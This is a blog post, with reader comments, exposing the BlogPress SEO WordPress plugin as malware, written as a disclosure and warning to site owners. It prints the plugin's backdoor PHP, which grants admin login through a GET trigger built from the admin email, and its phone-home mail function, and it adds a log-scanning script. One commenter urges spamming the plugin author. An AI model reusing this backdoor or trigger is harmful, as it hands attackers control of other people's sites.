BlogPress SEO is Malware

As with most scamming attempts, it all started with an email—which I ignored when I received it on Wednesday. It made claims of terrific SEO improvements using backlinks—yeah right. I do not use SEO enhancement plugins (other than Google XML Sitemaps), and never plan on doing so. Anyways, the sender’s name was Saurabh, and his message was as follows:

Hello, My name is Saurabh, and I am here to offer you a unique wordpress plugin which will get you 100′s of backlinks like crazy. The plugin is 100% free and I can also offer installation help. http://BlogPressSEO.com Why backlinks are important for getting traffic. http://BlogPressSEO.com/#1 This is how the plugin works http://BlogPressSEO.com/#2 Thanks


Well, even though I was not going to install the plugin, the engineer in me wanted to investigate the code. So, I downloaded it, and did not like what I saw. Not only are there malicious components, but there are also several stylistic issues, and the plugin author did not follow some of the WordPress plugin best practices. A short list of stylistic issues:

  • Did not use a unique prefix on function names to avoid collisions with other plugins. Function names include fun_serverpath, SureRemoveDir, fun_create_menu_wplink, wplink_activate, cleansee, etc. While it looks like fun_ is the prefix the author intended, fun is too common a word for a prefix and is used to denote that a quantity is a function in some programming styles. Plus, there is a ton of inconsistency between function names.
  • Saves its settings across several options entries. While this is no longer a great performance issue, thanks to autoloading, it still clutters the wp_options table and slows down every page load by a little bit. At least the author seems to use hwe_ as the prefix for most of the options it creates; too bad this was not done for the functions.
  • Performs raw SQL queries through mysql_query() instead of using the $wpdb object.

Analysis of the code is a little frightening. Look at this block of code:

//if loginyes and emial then login
// [editor's note] $loginyes and $email are taken straight from $_GET; the admin email is the only "secret"
if($loginyes==1  && $email==get_option('admin_email'))
{
	global $wpdb;
	$tabname=$wpdb->prefix."users";
	// [editor's note] first preference: an account literally named 'admin'
	$find_admin_sql="select * from $tabname where user_login='admin'";
	$find_sql=mysql_query($find_admin_sql);
	$user_numrow=mysql_num_rows($find_sql);
	if($user_numrow!=0)
	{
		$user_login='admin';			
	}
	if($user_numrow==0)
	{
		// [editor's note] otherwise walk the users table and take the first level-10 (administrator) account
		$find_ana_admin_sql="select * from $tabname";
		$find_sql_res=mysql_query($find_ana_admin_sql);
		while($row_find=mysql_fetch_array($find_sql_res))
		{
			$userid=$row_find['ID'];
			$user_login_find=$row_find['user_login'];
			$level=get_usermeta( $userid,'wp_user_level'); 
			if($level==10)
			{
				$user_login=$user_login_find;
				break;
			}
		}
	}		
	// [editor's note] log in as that user with no password check, set the auth cookie,
	// then bounce the browser to /wp-admin ($user_id is never defined here; the loop above uses $userid)
	$user=new WP_User(0, $user_login); 
	$user_pass = md5($user->user_pass);		 
	wp_login($user_login, $user_pass, true);		 
	wp_setcookie($user_login, $user_pass, true);         
	wp_set_current_user($user_id, $user_login);
	$radirect=get_option('home')."/wp-admin";	
	echo "<script language='javascript'>";
	echo "location.replace('$radirect')";
	echo "</script>";
}

Well, that looks like a backdoor, right? Knowing that $loginyes and $email are populated from the $_GET superglobal is even more worrying. Appending ?loginyes=1&email=<admin email> to any URL on a site running this plugin logs you in as an administrator: if an account named admin exists it is used, otherwise the first user with wp_user_level 10 is picked. All you need to know is the admin’s email address. Now, who would have that information?
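A defender-side check for the trigger described above: the following Python script (an added example, not code from this post or from the plugin) parses constructed Apache-style access log lines and flags every request whose query string carries loginyes=1 together with an email parameter, so a site owner can tell whether the backdoor was ever probed.

```python
# Added example: flag requests carrying the BlogPress SEO backdoor trigger
# (loginyes=1 plus an email parameter) in Apache-style access logs.
import re
from urllib.parse import parse_qs, urlsplit

# Matches the Common Log Format prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def is_backdoor_request(target: str) -> bool:
    """True when the query string has loginyes=1 and an email key.

    The plugin reads both values from $_GET, so a GET request with this
    pair is the only way the login block can be reached; the email may be
    URL-encoded (admin%40example.com), which parse_qs decodes for us.
    """
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return qs.get("loginyes", [""])[0] == "1" and "email" in qs


def scan_access_log(lines):
    """Return (ip, timestamp, target, status) for each matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_backdoor_request(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"),
                         m.group("target"), int(m.group("status"))))
    return hits


# Constructed sample lines (not real traffic). The plugin answers a successful
# trigger by echoing a JavaScript redirect to /wp-admin, not an HTTP redirect,
# so the status of the triggering request is the page's normal 200.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Feb/2011:10:14:02 +0000] "GET /?loginyes=1&email=admin%40example.com HTTP/1.1" 200 431',
    '203.0.113.5 - - [18/Feb/2011:10:14:03 +0000] "GET /wp-admin/ HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Feb/2011:11:02:44 +0000] "GET /?loginyes=1 HTTP/1.1" 200 8012',
    '198.51.100.7 - - [18/Feb/2011:11:03:10 +0000] "GET /2011/02/some-post/?p=12&loginyes=1&email=owner%40example.com HTTP/1.1" 200 8012',
]

if __name__ == "__main__":
    for ip, ts, target, status in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {ts} {status} {target}")
```

A hit followed shortly by /wp-admin/ requests from the same client, as in the first two sample lines, is the pattern to look for when judging whether a probe succeeded.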

function email_send_fun()
{
	// [editor's note] mails the site URL to the plugin author, with the admin email as From/Reply-to
	$headers="From:".get_option('admin_email')."\n";
	$headers.="Reply-to:".get_option('admin_email')."\n";
	$sub="BlogPressSeo new installation.";
	$mes=get_option('siteurl');
	$to="info@blogpressseo.com";	
	mail($to,$sub,$mes,$headers);
	$hwe_blogidd=get_option("hwe_blogid");
	
	// [editor's note] forces the link-placement settings on regardless of what the user chose
	update_option("hwe_saveradio_option",3);
	update_option("hwe_linkplacement",3);
	
	if($hwe_blogidd)
	{
		wplink_activate();
	}
}

Oh, right, that would be whoever reads info@blogpressseo.com. The function mails the site URL to that address with the admin’s email in the From and Reply-to headers, which is exactly the pair of facts the backdoor needs. This is the malicious function Joost de Valk found and reported in his post BlogPress SEO Plugin: Spam!, and it runs every time the plugin is activated.

If you have installed this plugin, delete it immediately. Then, change your admin email address (under Settings > General, look for the option E-mail address). You’ll also have to manually clean the hwe_ entries out of your wp_options table, as the author did not provide an uninstall method.

Update: You may want to read the next post on this topic, “BlogPress SEO Aftermath“.

-John Havlik

[end of transmission, stay tuned]

77 thoughts on “BlogPress SEO is Malware”

  1. I agree with Nik – There are no short cuts!

    I’m glad this information was posted and spread quickly. I’ll be informing my whole network to look out for this plug in and take a look at the ones they have.

    Things like this make it mandatory to change your password frequently. No amount of security is too much for a website in my opinion.

  2. Why not send the guy an email? We could ask him to stop, maybe spam him, maybe register his email account on as many spam sites as possible. After all we have the email account:
    info@blogpressseo.com
    We know he uses that account for at least one purpose and he probably checks it quite often. I say we teach him a lesson.

    • Hey now, we can’t condone the participation in any vigilante justice, especially if it qualifies as harassment. Even though the guy is malicious, and he is not from the United States… ;)

      -John Havlik

  3. The world of open source should not be corrupted by people like this. Thank you for this post with clear details. The first part could have been a genuine mistake but not the second one.

  4. I think the real problem is that Open Source is exploding. The security vulnerabilities which are deliberately or unintentionally written into software is the real problem if you ask me.

    You only need one piece of popular software with an exploit or a “backdoor” and then millions of websites are compromised.

    I just don’t see it working as well as it should be in some communities.

    • In other words. If it’s not backed by a real brand name, and they have no means to support what it is you are taking from them. Then you immediately have to second guess the real intention of the software.

      • james: I think the real problem is that Open Source is exploding. The security vulnerabilities which are deliberately or unintentionally written into software is the real problem if you ask me.

        I really do not see how this is an Open Source problem exactly. All software has security vulnerabilities, and always will as long as a human is involved.

        The fact that BlogPress SEO was readily available (e.g. it was free to download), allowed me to look at the source and find the backdoor. There really is nothing WordPress itself can do, other than lockdown the API and sandbox plugins, to prevent things like this. It ultimately comes down to the user, and the need for security education.

        -John Havlik

    • There is no way to really ban them, especially when they are not in the WordPress.org plugin repository. The only thing we can do is find these bad plugins early, and warn people about them.

      -John Havlik

    • Oh, I didn’t initially run into the backdoor, it was after I began writing (and said WTF? a few too many times) that I found the backdoor. There is much more crappiness in their code that I did not cover as I found the backdoor and was more interested in it than the code quality (for obvious reasons).

      -John Havlik
